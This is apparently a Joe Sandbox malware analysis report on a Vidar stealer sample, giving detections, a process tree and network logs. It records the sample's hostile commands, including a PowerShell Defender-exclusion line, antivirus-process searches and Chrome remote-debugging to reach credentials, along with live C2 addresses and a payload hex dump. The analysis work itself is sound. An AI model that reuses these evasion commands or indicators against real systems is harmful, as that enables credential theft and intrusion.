Edit tour

Windows Analysis Report
xoJxSAotVM.exe

Overview

General Information

Sample name:	xoJxSAotVM.exe renamed because original name is a hash value
Original sample name:	135436f1ae4e69f5098f8e74e3106863.exe
Analysis ID:	1568173
MD5:	135436f1ae4e69f5098f8e74e3106863
SHA1:	789cb8efbd9dc5ca1d31acdf22976f46ebbd057b
SHA256:	4535fab33b0df6f1864368f8736efb83d7d6a7db0a09b11e3d40c8b65b7d5428
Tags:	exeuser-smica83
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption

Multi AV Scanner detection for dropped file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected Vidar stealer

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list

Drops PE files with a suspicious file extension

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Copy From or To System Directory

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

xoJxSAotVM.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\xoJxSAotVM.exe" MD5: 135436F1AE4E69F5098F8E74E3106863)

powershell.exe (PID: 7696 cmdline: "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7900 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 7976 cmdline: "cmd.exe" /C C:\ProgramData\din.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

din.exe (PID: 8024 cmdline: C:\ProgramData\din.exe MD5: E3ADDF3612513EBE5830CD5C7C6F0E22)

cmd.exe (PID: 8068 cmdline: "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 8140 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 8172 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 8188 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7028 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7284 cmdline: cmd /c md 112974 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7328 cmdline: findstr /V "ApplianceFellowshipWhileRegistry" Beverly MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7376 cmdline: cmd /c copy /b ..\Bulgarian + ..\Apply + ..\Legs + ..\Rules + ..\Vat + ..\July + ..\Gamma + ..\Geographic r MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Decade.com (PID: 7368 cmdline: Decade.com r MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)

chrome.exe (PID: 7420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2564,i,11302442274769485425,11436489029941999890,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

choice.exe (PID: 7432 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

svchost.exe (PID: 8000 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\", CommandLine: "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xoJxSAotVM.exe", ParentImage: C:\Users\user\Desktop\xoJxSAotVM.exe, ParentProcessId: 7680, ParentProcessName: xoJxSAotVM.exe, ProcessCommandLine: "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\", ProcessId: 7696, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Decade.com r, ParentImage: C:\Users\user\AppData\Local\Temp\112974\Decade.com, ParentProcessId: 7368, ParentProcessName: Decade.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 7420, ProcessName: chrome.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\ProgramData\din.exe, ParentImage: C:\ProgramData\din.exe, ParentProcessId: 8024, ParentProcessName: din.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd, ProcessId: 8068, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\", CommandLine: "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\xoJxSAotVM.exe", ParentImage: C:\Users\user\Desktop\xoJxSAotVM.exe, ParentProcessId: 7680, ParentProcessName: xoJxSAotVM.exe, ProcessCommandLine: "powershell.exe" -C "Set-MpPreference -ExclusionPath C:\\", ProcessId: 7696, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8000, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Gone Gone.cmd && Gone.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8068, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7028, ProcessName: findstr.exe

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T12:16:04.837362+0100	2019714	2	Potentially Bad Traffic	192.168.2.4	49730	5.101.153.57	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T12:17:13.216477+0100	2044247	1	Malware Command and Control Activity Detected	159.69.102.165	443	192.168.2.4	49768	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T12:17:15.512266+0100	2051831	1	Malware Command and Control Activity Detected	159.69.102.165	443	192.168.2.4	49774	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-04T12:17:10.915098+0100	2049087	1	A Network Trojan was detected	192.168.2.4	49762	159.69.102.165	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\din.exe

ReversingLabs: Detection: 37%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1A056C0 BCryptGenRandom,SystemFunction036,HeapFree,HeapFree,	0_2_00007FF6B1A056C0
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1981770 EncryptMessage,HeapFree,HeapFree,	0_2_00007FF6B1981770
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B1983E60 DecryptMessage,HeapFree,HeapFree,	0_2_00007FF6B1983E60
Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B18D7E90 BCryptGenRandom,SystemFunction036,HeapFree,	0_2_00007FF6B18D7E90

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 159.69.102.165:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49829 version: TLS 1.2

Source: xoJxSAotVM.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: cryptosetup.pdbGCTL source: HLNYCB.16.dr
Source:	Binary string: cryptosetup.pdb source: HLNYCB.16.dr
Source:	Binary string: rustdropper.pdb source: xoJxSAotVM.exe

Source: C:\Users\user\Desktop\xoJxSAotVM.exe	Code function: 0_2_00007FF6B19B0A00 GetFileInformationByHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,FindFirstFileW,FindClose,HeapFree,	0_2_00007FF6B19B0A00
Source: C:\ProgramData\din.exe	Code function: 6_2_00406301 FindFirstFileW,FindClose,	6_2_00406301
Source: C:\ProgramData\din.exe	Code function: 6_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	6_2_00406CC7

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\112974	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\112974\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 13MB later: 41MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49762 -> 159.69.102.165:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 159.69.102.165:443 -> 192.168.2.4:49774
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 159.69.102.165:443 -> 192.168.2.4:49768

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx-reuseport/1.21.1Date: Wed, 04 Dec 2024 11:16:04 GMTContent-Type: application/octet-streamContent-Length: 1188347Last-Modified: Mon, 02 Dec 2024 12:24:06 GMTConnection: keep-aliveKeep-Alive: timeout=30ETag: "674da6e6-1221fb"Expires: Fri, 03 Jan 2025 11:16:04 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 ca 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 70 10 00 00 04 00 00 7c ac 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 26 58 00 00 00 00 00 00 00 00 00 00 9b f9 11 00 60 28 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 26 58 00 00 00 00 10 00 00 5a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 60 10 00 00 10 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ

Source: global traffic

HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49730 -> 5.101.153.57:80

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.63

Source: C:\Users\user\Desktop\xoJxSAotVM.exe

Code function: 0_2_00007FF6B19C7890 HeapFree,HeapFree,recv,WSAGetLastError,HeapFree,HeapFree,

0_2_00007FF6B19C7890

Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZvmSW+YphKmpmnN&MD=UsTpCsxu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ZvmSW+YphKmpmnN&MD=UsTpCsxu HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kresk.lolConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
